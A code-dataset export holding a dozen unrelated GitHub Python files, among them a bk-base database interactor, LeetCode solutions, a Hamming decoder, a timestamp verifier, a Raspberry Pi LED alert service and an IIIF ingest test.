 about_time() as t:\n self.sessions[BackendType.DGRAPH].commit()\n self.commit_metric(t, BackendType.DGRAPH.value)\n\n if self.available_backends.get(BackendType.CONFIG_DB, False):\n with about_time() as t:\n self.sessions[BackendType.CONFIG_DB].commit()\n self.commit_metric(t, BackendType.CONFIG_DB.value)\n\n if self.available_backends.get(BackendType.MYSQL, False):\n with about_time() as t:\n self.sessions[BackendType.MYSQL].commit()\n self.commit_metric(t, BackendType.MYSQL.value)\n\n del self.sessions\n\n def commit_metric(self, t, session_type):\n \"\"\"\n Record commit metrics.\n\n :param t: elapsed-time context\n :param session_type: session type\n :return:\n \"\"\"\n self.logger.info(\n {\n 'session_type': '{}'.format(session_type),\n 'metric_type': 'session_commit',\n 'elapsed_time': t.duration,\n 'invoke_elapsed_time': self.metric_store.get('{}_invoke_elapsed_time'.format(session_type), 0.0),\n 'operate_ids': self.metric_store.get('{}_operate_ids'.format(session_type), []),\n },\n extra={'output_metric': True},\n )\n\n def interact_with_mysql(\n self,\n ):\n \"\"\"\n Interact with MySQL\n\n :return:\n \"\"\"\n with Timeout(\n self.son_timeout_sec, InteractTimeOut(_('mysql interact timeout in {}.').format(self.son_timeout_sec))\n ):\n rt_local.mysql_session_now = mysql_session = self.sessions[BackendType.MYSQL]\n mysql_b = (\n BatchMySQLReplicaOrchestrator(backend_session=mysql_session)\n if self.batch\n else MySQLReplicaOrchestrator(backend_session=mysql_session)\n )\n with about_time() as t:\n mysql_b.dispatch(self.operate_records)\n self.sync_metric(self.record_keys_lst, 'mysql', 'interactor_dispatch', t, self.metric_store)\n\n def interact_with_dgraph(self):\n \"\"\"\n Interact with Dgraph\n\n :return:\n \"\"\"\n with Timeout(\n self.son_timeout_sec, InteractTimeOut(_('dgraph interact timeout in {}.').format(self.son_timeout_sec))\n ):\n rt_local.dgraph_session_now = dgraph_session = self.sessions[BackendType.DGRAPH]\n dgraph_b = (\n BatchDGraphOrchestrator(backend_session=dgraph_session)\n if self.batch\n else SingleDGraphOrchestrator(backend_session=dgraph_session)\n )\n with about_time() as t:\n dgraph_b.dispatch(self.operate_records)\n self.sync_metric(self.record_keys_lst, 'dgraph', 'interactor_dispatch', t, self.metric_store)\n\n def renew_config_db(\n self,\n ):\n \"\"\"\n Interact with ConfigDB\n\n :return:\n \"\"\"\n with Timeout(\n self.son_timeout_sec, InteractTimeOut(_('config_db interact timeout in {}.').format(self.son_timeout_sec))\n ):\n rt_local.mysql_session_now = mysql_session = self.sessions[BackendType.CONFIG_DB]\n mysql_b = (\n BatchMySQLReplicaOrchestrator(backend_session=mysql_session)\n if self.batch\n else MySQLReplicaOrchestrator(backend_session=mysql_session)\n )\n with about_time() as t:\n mysql_b.dispatch(self.operate_records)\n self.sync_metric(self.record_keys_lst, 'config_db', 'interactor_dispatch', t, self.metric_store)\n\n def sync_metric(self, record_id_lst, backend_type, metric_type, cost, metric_store=None):\n if metric_store is not None:\n metric_store['{}_invoke_elapsed_time'.format(backend_type)] = cost.duration\n metric_store['{}_operate_ids'.format(backend_type)] = record_id_lst\n self.logger.info(\n {\n 'record_ids': record_id_lst,\n 'backend_type': backend_type,\n 'metric_type': metric_type,\n 'elapsed_time': cost.duration,\n },\n extra={'output_metric': True},\n 
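`ParallelInteractor` above runs one greenlet per enabled backend, bounds the whole dispatch with a `gevent.Timeout`, and surfaces any greenlet failure after `joinall`. A stripped-down sketch of that pattern, with toy writer functions standing in for the real orchestrators:

```python
import gevent
from gevent import Timeout, joinall, killall

def write_backend(name, seconds):
    # Stand-in for one backend's dispatch work.
    gevent.sleep(seconds)
    print(f"{name} committed")

greenlets = []
try:
    with Timeout(2, RuntimeError("dispatch timeout in 2s")):
        greenlets = [
            gevent.spawn(write_backend, "mysql", 0.1),
            gevent.spawn(write_backend, "dgraph", 0.2),
        ]
        # Wait for all writers; collect failures instead of raising mid-join.
        joinall(greenlets, raise_error=False)
        for g in greenlets:
            if not g.successful():
                raise g.exception
finally:
    # Whatever happened, no writer greenlet should outlive the dispatch.
    killall(greenlets)
```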
)\n","repo_name":"Tencent/bk-base","sub_path":"src/datamgr/metadata/metadata/interactor/interact.py","file_name":"interact.py","file_ext":"py","file_size_in_byte":14376,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"} +{"seq_id":"38927412600","text":"#\r\n# @lc app=leetcode id=211 lang=python3\r\n#\r\n# [211] Design Add and Search Words Data Structure\r\n#\r\n\r\n# @lc code=start\r\n\r\nclass TrieNode():\r\n\r\n def __init__(self):\r\n self.children = [None] * 128\r\n self.end = False\r\n\r\n def set_char(self, char):\r\n index = ord(char)\r\n node = TrieNode()\r\n self.children[index] = node\r\n return node\r\n\r\n def get_child(self, char):\r\n index = ord(char)\r\n return self.children[index]\r\n\r\n\r\nclass Trie:\r\n \"\"\"\r\n noob implement\r\n \"\"\"\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.root = TrieNode()\r\n\r\n def insert(self, word: str) -> None:\r\n \"\"\"\r\n Inserts a word into the trie.\r\n \"\"\"\r\n head = self.root\r\n for w in word:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n head = head.set_char(w)\r\n head.end = True\r\n\r\n def search(self, root, word: str, index) -> bool:\r\n \"\"\"\r\n Returns if the word is in the trie.\r\n \"\"\"\r\n print(word[index:])\r\n if index == len(word):\r\n return root.end\r\n\r\n head = root\r\n for i in range(index, len(word)):\r\n w = word[i]\r\n if w == \".\":\r\n for c in head.children:\r\n if c and self.search(c, word, i+1):\r\n return True\r\n return False\r\n else:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n return False\r\n return head.end\r\n\r\n def startsWith(self, prefix: str) -> bool:\r\n \"\"\"\r\n Returns if there is any word in the trie that starts with the given prefix.\r\n \"\"\"\r\n head = self.root\r\n for w in prefix:\r\n node = head.get_child(w)\r\n if node:\r\n head = node\r\n else:\r\n return False\r\n return True\r\n\r\n\r\nclass WordDictionary:\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.trie = Trie()\r\n\r\n def addWord(self, word: str) -> None:\r\n \"\"\"\r\n Adds a word into the data structure.\r\n \"\"\"\r\n self.trie.insert(word)\r\n\r\n def search(self, word: str) -> bool:\r\n \"\"\"\r\n Returns if the word is in the data structure. A word could contain the dot character '.' 
to represent any one letter.\r\n \"\"\"\r\n return self.trie.search(self.trie.root, word, 0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n s = WordDictionary()\r\n s.addWord(\"bad\")\r\n print(s.search(\"b.d\"))\r\n\r\n# Your WordDictionary object will be instantiated and called as such:\r\n# obj = WordDictionary()\r\n# obj.addWord(word)\r\n# param_2 = obj.search(word)\r\n# @lc code=end\r\n","repo_name":"huhudev-git/leetcode","sub_path":"211.design-add-and-search-words-data-structure.py","file_name":"211.design-add-and-search-words-data-structure.py","file_ext":"py","file_size_in_byte":2901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"39108269451","text":"import matplotlib.pyplot as plt\r\nimport csv, random\r\nfrom datetime import datetime\r\n\r\nfilename= 'aboration_rate.csv'\r\nwith open(filename) as f:\r\n reader = csv.reader(f)\r\n header_row = next(reader)\r\n\r\n for index, data in enumerate(header_row):\r\n print(index, data)\r\n\r\n abortion, ages, period = [], [], []\r\n\r\n for row in reader:\r\n period.append(row[0])\r\n abortion.append(float(row[2]))\r\n ages.append(row[1])\r\n\r\nfig = plt.figure(dpi=128)\r\ncolors = ['red', 'blue', 'green', 'lightblue', 'yellow', 'darkgreen', 'darkblue', 'violet']\r\nx=0\r\ny=9\r\nyear = 2000\r\nfor i in range(19):\r\n plt.plot(ages[x:y], abortion[x:y], c=random.choice(colors), label=str(year))\r\n x+=8\r\n y+=8\r\n year+=1\r\n\r\nplt.title(\"Abortion rate from 2000 to 2018\", fontsize=24)\r\nplt.xlabel(\"Women age\", fontsize=14)\r\nplt.ylabel(\"Abortion Rate\", fontsize=14)\r\nplt.tick_params(axis='both', labelsize=14)\r\nfig.autofmt_xdate()\r\nplt.legend()\r\nplt.show()\r\n\r\n","repo_name":"AliAhmed15245/Data-visualiztion-python","sub_path":"csv files visualization/aboration_rate.py","file_name":"aboration_rate.py","file_ext":"py","file_size_in_byte":967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"3824225489","text":"\"\"\"\nModule to confirm the integrity of the timestamped document\n\"\"\"\nfrom pyasn1.type import univ\nfrom pyasn1.codec.der import decoder\nimport hashlib\nfrom rfc3161 import TimeStampResp, TSTInfo\n\nTSR_FILE = 'READ_ME__txt.tsr'\nFILE = 'READ_ME_.txt'\n\ndigest_algorithms = {\n univ.ObjectIdentifier('1.3.14.3.2.26'): 'sha1',\n univ.ObjectIdentifier('1.2.840.113549.2.5'): 'md5',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.1'): 'sha256',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.2'): 'sha384',\n univ.ObjectIdentifier('2.16.840.1.101.3.4.2.3'): 'sha512'\n}\n\n\ndef main(tsr: str, file: str):\n \"\"\"\n :param tsr: Verified timestamp response filepath\n :param file: Original document path\n :return:\n \"\"\"\n print('Confirming the integrity of original document...')\n try:\n response, _ = decoder.decode(open(tsr, 'rb').read(), asn1Spec=TimeStampResp())\n\n e_content = response['timeStampToken']['content']['encapContentInfo']['eContent']\n tst_info, _ = decoder.decode(e_content, asn1Spec=TSTInfo())\n\n if tst_info['messageImprint']['hashAlgorithm']['algorithm'] in digest_algorithms:\n hash_str = digest_algorithms.get(tst_info['messageImprint']['hashAlgorithm']['algorithm'])\n else:\n print(f'The hash algorithm is not listed', str(tst_info['messageImprint']['hashAlgorithm']['algorithm']))\n return False\n\n hash_tst = tst_info['messageImprint']['hashedMessage']\n\n hash_obj = hashlib.new(hash_str)\n\n with open(file, 'rb') as doc:\n hash_obj.update(doc.read())\n\n print('TSTInfo
 hashedMessage: ', hash_tst.asOctets().hex())\n print('Hash of original file: ', hash_obj.digest().hex())\n\n assert hash_tst.asOctets() == hash_obj.digest()\n return True\n except Exception as e:\n print('The file has changed since the date in TSTInfo', e)\n\n return False\n\n\nif __name__ == '__main__':\n main(TSR_FILE, FILE)\n","repo_name":"NuqieNoila/dts_client","sub_path":"confirm.py","file_name":"confirm.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70114487401","text":"#\n# https://leetcode.com/explore/learn/card/heap/643/heap/4017/\n#\n#\n\nfrom typing import List\nimport sys\nimport pdb\nbr = pdb.set_trace\n\nsolution_json = {\n \"date\": \"2022/10/4\",\n \"design\": 0,\n \"coding\": 0,\n \"runtime\": \"?? ms\",\n \"fasterThan\": \"\",\n \"memory\": \"?? MB\" \n}\n\nclass Solution:\n def __init__(self):\n self.module = sys.modules[__name__]\n\n\"\"\"\n 0\n 1 2\n 3 4 5 6\n\"\"\"\n\ndef parent(i):\n if i % 2 == 0:\n return (i - 1) // 2\n else:\n return i // 2\n\ndef left(i):\n return i * 2 + 1\n\ndef right(i):\n return (i + 1) * 2 \n\n\"\"\"\n 3 1 \n 1 ---> 3 \n\"\"\"\n\ndef heapify(a):\n n = len(a)\n i = n - 1\n while True:\n if i == 0:\n break\n\n if a[i] < a[parent(i)]:\n swap(a, i, parent(i))\n i = parent(i)\n else:\n break\n\ndef swap(a, i, j):\n a[i], a[j] = a[j], a[i] \n\n'''\n 10 10 10\n 3 5 3 20 5 3 \n'''\ndef down_heapify(a):\n n = len(a)\n i = 0 \n while True:\n idx = None \n if left(i) <= n - 1:\n if a[left(i)] < a[i]:\n idx = left(i)\n\n if right(i) <= n - 1:\n if a[right(i)] < a[i]:\n if idx == None:\n idx = right(i)\n else:\n if a[right(i)] < a[idx]:\n idx = right(i)\n\n if idx == None:\n break\n\n swap(a, idx, i)\n i = idx \n\n#\n# Implementing \"Min Heap\"\n#\n\nclass MinHeap:\n def __init__(self, heapSize):\n self.a = []\n self.max = heapSize\n pass\n\n #\n # Example:\n # obj = MinHeap()\n # ...\n # print(str(obj))\n # [1,2,3]\n #\n\n def __str__(self):\n return \"%s\" % self.a \n\n def dump(self):\n print('%s' % self.a)\n\n #\n # Function to add an element\n # element >= 1\n # \n \"\"\"\n 3\n 1 2\n \"\"\"\n def add(self, element):\n self.a.append(element)\n heapify(self.a)\n pass\n \n #\n # Get the top element of the Heap\n #\n\n def peek(self):\n return self.a[0]\n \n #\n # Delete the top element of the Heap\n #\n\n def pop(self):\n last_i = len(self.a) - 1\n swap(self.a, 0, last_i)\n min_v = self.a.pop()\n down_heapify(self.a)\n return min_v\n \n #\n # return the number of elements in the Heap\n #\n\n def size(self):\n return len(self.a)\n","repo_name":"CountChu/LeetCodePython","sub_path":"learn_07_heap/solutions/my001-min-heap-s2.py","file_name":"my001-min-heap-s2.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70782457641","text":"import argparse\nimport contextlib\nimport numpy as np\n\nfrom inout_bits import BitInputStream, BitOutputStream\n\n\nCORRECTION_MATRIX = np.array([[0, 0, 0, 1, 1, 1, 1],\n [0, 1, 1, 0, 0, 1, 1],\n [1, 0, 1, 0, 1, 0, 1]])\n\n\ndef parse_arguments():\n \"\"\"\n Handle and parse program arguments.\n\n Returns:\n argparse.Namespace: namespace with 2 parsed arguments:\n - input_file -- the encoded input file\n - output_file -- the decoded output file\n \"\"\"\n arg_parser = argparse.ArgumentParser(\n description='Decode a file encoded with the extended Hamming (8, 4) code'\n )\n\n arg_parser.add_argument(\n 'input_file',\n help='Input file',\n\n )\n\n
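The array-backed `MinHeap` above relies on the usual index arithmetic: for a node at index `i` the children sit at `2*i + 1` and `2*i + 2`, and the parent at `(i - 1) // 2`, which is exactly what the even/odd branch in `parent` computes. A quick self-contained check of the sift-up step (the `heapify` above), under those layout assumptions:

```python
def parent(i):
    return (i - 1) // 2  # equivalent to the even/odd branch above

def sift_up(a):
    # Restore the min-heap property after appending to the end.
    i = len(a) - 1
    while i > 0 and a[i] < a[parent(i)]:
        a[i], a[parent(i)] = a[parent(i)], a[i]
        i = parent(i)

heap = []
for x in [5, 3, 8, 1]:
    heap.append(x)
    sift_up(heap)

print(heap[0])  # 1 -- the minimum is always at index 0
print(heap)     # [1, 3, 8, 5]: valid heap order, not sorted order
```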
 arg_parser.add_argument(\n 'output_file',\n help='Decoded output file'\n )\n\n return arg_parser.parse_args()\n\n\nclass HammingDecoder:\n def __init__(self):\n self.doubleErrorCounter = 0\n\n def decode(self, bit_array):\n parity = bit_array[-1]\n bit_array = bit_array[:-1]\n wrong_bit = np.dot(CORRECTION_MATRIX, bit_array) % 2\n wrong_bit = int(f\"0b{''.join(map(str, wrong_bit))}\", 2)\n\n if wrong_bit > 0:\n if parity == 0:\n self.doubleErrorCounter += 1\n else:\n if wrong_bit < 5:\n bit_array[wrong_bit-1] = int(not bit_array[wrong_bit-1])\n\n return bit_array[:4]\n\n\ndef decode():\n \"\"\"Decode file with Hamming coding.\"\"\"\n args = parse_arguments()\n hc = HammingDecoder()\n with contextlib.closing(BitInputStream(open(args.input_file, \"rb\"))) as bit_in, \\\n contextlib.closing(BitOutputStream(open(args.output_file, \"wb\"))) as bit_out:\n bits = bit_in.bits_array(8)\n while bits.size > 0:\n bit_out.write_array(hc.decode(bits))\n bits = bit_in.bits_array(8)\n print(\"Decoded\")\n print(\"Number of double errors:\", hc.doubleErrorCounter)\n\n\nif __name__ == \"__main__\":\n decode()\n","repo_name":"barchuckie/co-co","sub_path":"zad7/dekoder.py","file_name":"dekoder.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10944001651","text":"# Luke Chase\n# Updated Alice_Words program --- Assessment Program\n# Computer Science II\n# October 1, 2017\ntry:\n file = open(\"Alice's_Adventures_In_Wonderland_via_Gutenberg.txt\", \"r\")\n file = file.read()\n def sort(text):\n dictionary = {}\n alphabetical_dictionary = {}\n word = \"\"\n for aline in text:\n letter = aline\n if letter!= \" \":\n word = word + letter\n else:\n dictionary[word] = text.count(word)\n word = \"\"\n key_list = list(dictionary.keys())\n key_list = sorted(dictionary)\n begin = key_list.index(\"A\")\n for i in key_list[begin:]:\n alphabetical_dictionary[i] = text.count(i)\n return alphabetical_dictionary\n\n dictionary = sort(file)\n print(dictionary)\n\n try:\n text_thing = open(\"GET_WRITTEN_ON_YA_ALICE\", \"w\")\n try:\n text_thing.write(str(dictionary))\n finally:\n text_thing.close()\n finally:\n text_thing.close()\nexcept IOError:\n print(\"This file is not found.\")\n","repo_name":"SlyesKimo123/ComputadoraScience2","sub_path":"Assessment/Assessment Program(Alice_Words).py","file_name":"Assessment Program(Alice_Words).py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74907586921","text":"# from http.server import HTTPServer, SimpleHTTPRequestHandler\nfrom distutils.dir_util import copy_tree\nfrom livereload import Server\nfrom pathlib import Path\nimport contextlib\nimport subprocess\nimport shutil\nimport glob\nimport sys\nimport os\n\nRELEASE_MODE = len(sys.argv) >= 2 and sys.argv[1] == \"--release\"\n\n\ndef supress_stdout(func):\n def wrapper(*a, **ka):\n with open(os.devnull, 'w') as devnull:\n with contextlib.redirect_stdout(devnull):\n func(*a, **ka)\n return wrapper\n\n\ndef make_required_directories():\n Path(\"./build/smooth/__target2__\").mkdir(exist_ok=True, parents=True)\n Path(\"./output\").mkdir(exist_ok=True, parents=True)\n\n\ndef js_to_py(filename):\n return str(filename).replace(\".js\", \".py\")\n\n\ndef js_to_svelte(filename):\n return str(filename).replace(\".js\", \".svelte\")\n\n\ndef copy_to_svelte_project_dir():\n for f in glob.glob('./src/*.*'):\n shutil.copy(f, './build/src')\n
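`HammingDecoder.decode` above multiplies `CORRECTION_MATRIX` by the first seven received bits mod 2; the three syndrome bits, read as a binary number, give the 1-based position of a single flipped bit (a non-zero syndrome with even overall parity is instead counted as a double error, and the module only corrects positions 1-4, the data bits). A small worked example of that syndrome computation, reusing the same matrix on an all-zero codeword with bit 3 flipped:

```python
import numpy as np

H = np.array([[0, 0, 0, 1, 1, 1, 1],
              [0, 1, 1, 0, 0, 1, 1],
              [1, 0, 1, 0, 1, 0, 1]])

# Start from the all-zero codeword (trivially valid) and flip bit 3 (1-based).
received = np.zeros(7, dtype=int)
received[2] ^= 1

syndrome = np.dot(H, received) % 2
position = int("".join(map(str, syndrome)), 2)

print(syndrome)   # [0 1 1]
print(position)   # 3 -- the 1-based index of the corrupted bit
```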
 for f in glob.glob('./src/pages/*.svelte'):\n shutil.copy(f, './build/src/pages')\n\n\ndef copy_to_root():\n for f in glob.glob('./src/root/*'):\n shutil.copy(f, './output')\n\n\ndef run_transcrypt():\n for f in glob.glob(\"./build/smooth/pages/*.py\"):\n cmd = f\"python ./cryptic/src/__main__.py -b -n -g {f}\"\n subprocess.run(cmd, shell=True, stdout=open(os.devnull, \"w\"))\n copy_tree(\"./build/smooth/pages/__target__\",\n \"./build/smooth/__target2__\")\n\n\ndef append_transpiled_python():\n files = glob.glob(\"./build/smooth/__target2__/*.js\")\n for f in files:\n if \"org.transcrypt.__runtime__\" in f:\n shutil.copy(f, './build/src/pages')\n continue\n with open(f, \"r\") as reader:\n file_contents = reader.read()\n file_contents = \"\"\n file_name = Path(f).name\n svelte_file_name = js_to_svelte(file_name)\n with open(f\"./build/src/pages/{svelte_file_name}\", \"a\") as writer:\n writer.write(\"\")\n writer.write(file_contents)\n\n\ndef rollup():\n if RELEASE_MODE:\n subprocess.run(\"npm run build-prod\", cwd=\"./build\", shell=True)\n else:\n subprocess.run(\"npm run build-dev\", cwd=\"./build\", shell=True)\n\n\ndef run(port=4200):\n server = Server()\n server.watch('src', refresh)\n server.serve(port=port, root='output')\n\n\ndef refresh():\n copy_tree(\"./src\", \"./build/smooth\")\n make_required_directories()\n run_transcrypt()\n copy_to_svelte_project_dir()\n copy_to_root()\n append_transpiled_python()\n rollup()\n\n\nif __name__ == \"__main__\":\n refresh()\n if not RELEASE_MODE:\n run()\n","repo_name":"chris-koch-penn/smooth.py","sub_path":"smoothie.py","file_name":"smoothie.py","file_ext":"py","file_size_in_byte":2665,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"11409363752","text":"import time\r\nimport json\r\nfrom datetime import datetime\r\nimport requests\r\nimport threading\r\nimport random\r\nimport RPi.GPIO as GPIO\r\nfrom registration import *\r\nfrom MyMQTT import *\r\n\r\n# The RPi controls LEDs which are activated based on the freezing status\r\n# MQTT methods:\r\n# subscriber to retrieve info on the freezing status \r\n\r\nclass RPi():\r\n def __init__(self,broker,port,topic, LED_red, LED_green, LED_white):\r\n self.client=MyMQTT('RPI',broker,port,self)\r\n self.topic=topic\r\n self.LED_red = LED_red\r\n self.LED_green = LED_green\r\n self.LED_white = LED_white\r\n self.client.start()\r\n self.client.mySubscribe(self.topic)\r\n def stop(self):\r\n self.client.stop() \r\n def notify(self,payload): \r\n alert = json.loads(payload)\r\n dataIncoming = alert['result'] \r\n # format message: 1 for freezing for sure, 2 for possible freezing, 3 no freezing \r\n \r\n # Initialization - switch off all the leds\r\n GPIO.output(LED_red, GPIO.LOW)\r\n GPIO.output(LED_white, GPIO.LOW)\r\n GPIO.output(LED_green, GPIO.LOW) \r\n\r\n if dataIncoming == 1: \r\n # 1 = freezing for sure\r\n print('Freezing for sure')\r\n start = time.time() \r\n end = time.time() \r\n # blinks for 5 seconds\r\n while end - start < 5:\r\n GPIO.output(self.LED_red, GPIO.HIGH) # led is switched on\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_red, GPIO.LOW) # led is switched off\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_red, GPIO.HIGH) # led is switched on \r\n end = time.time() \r\n \r\n GPIO.output(self.LED_red, GPIO.HIGH) # red led stays on, because the user may be absent or not notice it -> more awareness\r\n\r\n elif dataIncoming == 2: \r\n # 2 = possible freezing\r\n print('Possible freezing')\r\n start = time.time() \r\n end = time.time() \r\n # blinks for 5 seconds \r\n while end - start < 5:\r\n GPIO.output(self.LED_white, GPIO.HIGH) # led is switched on\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_white, GPIO.LOW) # led is switched off\r\n time.sleep(1) # wait for 1 second\r\n GPIO.output(self.LED_white, GPIO.HIGH) # led is switched on \r\n end = time.time() \r\n \r\n GPIO.output(self.LED_red, GPIO.HIGH) # red led stays on, because the user may be absent or not notice it -> more awareness\r\n \r\n else:\r\n print('No freezing')\r\n GPIO.output(self.LED_green, GPIO.HIGH) # green led is switched on to signal that everything is fine\r\n\r\n\r\nclass Update(threading.Thread): # Multithreading for doing the update\r\n def __init__(self, threadID,time_update,sr):\r\n threading.Thread.__init__(self)\r\n self.threadID = threadID\r\n self.time_update=time_update\r\n self.sr=sr\r\n def run(self):\r\n while True:\r\n self.sr.update()\r\n time.sleep(self.time_update)\r\n\r\n\r\nif __name__=='__main__':\r\n # 1. SERVICE REGISTRATION to catalog \r\n conf = json.load(open('settings.json')) # read data from settings.json\r\n payload = conf[\"ServiceData\"] # retrieve service data\r\n catalog_URL=conf[\"catalogURL\"] # retrieve catalog url\r\n service = registration(catalog_URL, payload)\r\n try: \r\n service.register()\r\n except:\r\n print('Catalog not connected!')\r\n raise SystemExit\r\n\r\n subscribeTopic = conf[\"ServiceData\"][\"MQTT_Topic\"]\r\n info=(requests.get(catalog_URL+\"/broker\")).json()\r\n\r\n # Set up the Raspberry pi\r\n # set up pin numbering\r\n GPIO.setmode(GPIO.BOARD)\r\n GPIO.setwarnings(False)\r\n\r\n # Assign a pin number to every led corresponding to the raspberry pi header\r\n LED_red = 7 #GPIO4\r\n LED_green = 11 #GPIO17\r\n LED_white = 13 #GPIO27\r\n\r\n # Set the output to the correct pin\r\n GPIO.setup(LED_red, GPIO.OUT)\r\n GPIO.setup(LED_green, GPIO.OUT)\r\n GPIO.setup(LED_white, GPIO.OUT)\r\n\r\n # Initialization - switch off all the leds\r\n GPIO.output(LED_red, GPIO.LOW)\r\n GPIO.output(LED_white, GPIO.LOW)\r\n GPIO.output(LED_green, GPIO.LOW)\r\n\r\n rpi=RPi(info['broker'][\"url\"],info['broker'][\"port\"],subscribeTopic, LED_red, LED_green, LED_white) \r\n t1 = Update(1,conf['timeforupdate'],service) #updating the timestamp of the service \r\n t1.start()\r\n t1.join()\r\n\r\n while True:\r\n time.sleep(10)\r\n","repo_name":"Joseph9994/Agropy","sub_path":"RPi/Rpi.py","file_name":"Rpi.py","file_ext":"py","file_size_in_byte":5372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"5119021857","text":"import psycopg2\nimport time\n\nfrom Connection import Connection, Listener\nfrom functools import partial\nfrom handlers.request_handlers import list_products, create_product, create_db, seed_db\n\nif __name__ == \"__main__\":\n conn = psycopg2.connect(host=\"postgres\", port=5432, user=\"postgres\")\n request_handlers = {\n \"list-products\": partial(list_products, conn),\n \"create-product\": partial(create_product, conn),\n \"create-database\": partial(create_db, conn),\n \"seed-database\": partial(seed_db, conn),\n }\n c = Connection(\n \"main-queue\",\n \"control-queue\",\n 61613,\n Listener(request_handlers=request_handlers),\n \"warehouse-message-handler\",\n )\n\n while True:\n # keep app running to prevent docker from terminating\n 
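The `notify` handler in Rpi.py repeats an almost identical blink loop for each alert level; only the blinking LED and the LED left on afterwards change. One way to express that mapping is a dispatch table, sketched here without `RPi.GPIO` so it runs anywhere (the pin numbers are the ones assigned in the script, but the table itself is only an illustration, not the project's code):

```python
import time

# status code -> (LED to blink, LED left on afterwards), mirroring notify()
LED_RED, LED_GREEN, LED_WHITE = 7, 11, 13
STATUS_LEDS = {
    1: (LED_RED, LED_RED),    # freezing for sure
    2: (LED_WHITE, LED_RED),  # possible freezing
    3: (None, LED_GREEN),     # no freezing
}

def handle_status(code, blink_seconds=5, period=1):
    blink_led, steady_led = STATUS_LEDS[code]
    if blink_led is not None:
        end = time.monotonic() + blink_seconds
        while time.monotonic() < end:
            print(f"LED {blink_led} on")   # stand-in for GPIO.output(blink_led, GPIO.HIGH)
            time.sleep(period)
            print(f"LED {blink_led} off")  # stand-in for GPIO.output(blink_led, GPIO.LOW)
            time.sleep(period)
    print(f"LED {steady_led} stays on")    # stand-in for GPIO.output(steady_led, GPIO.HIGH)

handle_status(2, blink_seconds=0.04, period=0.01)
```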
time.sleep(0.01)\n","repo_name":"StefanEvanghelides/eai2019","sub_path":"WarehouseMessageHandler/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"19200050292","text":"# check if list is a mountain array\n# Leetcode, arrays 101\n\n# so many exceptions....\n\nclass Solution:\n def validMountainArray(self, arr: list) -> bool:\n mountain = False\n peak = 0\n\n for i in range(1, len(arr) - 1):\n if arr[i] == arr[i - 1]:\n return False\n\n if arr[i] < arr[i - 1] and arr[i] <= arr[i + 1]:\n peak += 1\n if arr[i] > arr[i - 1] and arr[i] >= arr[i + 1]:\n peak += 1\n\n if peak >= 1 and arr[i] <= arr[i + 1]:\n return False\n\n if peak == 1:\n mountain = True\n\n return mountain\n\nif __name__ == \"__main__\":\n test_arr = [1,1,1,1,1,1,1,2,1]\n\n test_obj = Solution()\n print(test_obj.validMountainArray(test_arr))\n","repo_name":"karanpolobotu/PythonCatchup","sub_path":"Python3code/02-2022/feb19.py","file_name":"feb19.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16643955804","text":"import argparse\nimport logging\nimport os\nimport sys\n\nimport boto3\n\nROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.insert(0, os.path.join(ROOT_DIR, 'src'))\n\n\nfrom IIIFingest.auth import Credentials # noqa: E402\nfrom IIIFingest.client import Client # noqa: E402\n\n\ndef test_ingest_pipeline(args) -> None:\n\n # Logging configuration\n root = logging.getLogger()\n root.setLevel(logging.INFO)\n\n pkg = logging.getLogger('IIIFingest')\n pkg.setLevel(logging.DEBUG)\n\n handler = logging.StreamHandler(sys.stdout)\n handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\n '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n )\n handler.setFormatter(formatter)\n root.addHandler(handler)\n\n # Client configuration\n asset_prefix = args.asset_prefix\n issuer = args.issuer\n space = args.space\n environment = args.environment\n session = boto3.Session(profile_name=f\"mps-{space}-{environment}\")\n\n jwt_creds = Credentials(\n issuer=issuer,\n kid=f\"{issuer}default\",\n private_key_path=os.path.join(\n ROOT_DIR, f\"auth/{environment}/keys/{issuer}/{issuer}default/private.key\"\n ),\n )\n\n client = Client(\n space=space,\n environment=environment,\n asset_prefix=asset_prefix,\n jwt_creds=jwt_creds,\n boto_session=session,\n )\n\n images = [\n {\n \"label\": \"27.586.126A\",\n \"filepath\": os.path.join(ROOT_DIR, \"tests/images/mcihtest1.tif\"),\n },\n {\n \"label\": \"27.586.248A\",\n \"filepath\": os.path.join(ROOT_DIR, \"tests/images/mcihtest2.tif\"),\n \"metadata\": [{\"label\": \"Test\", \"value\": \"Image level metadata\"}],\n },\n {\n \"label\": \"27.586.249A\",\n \"filepath\": 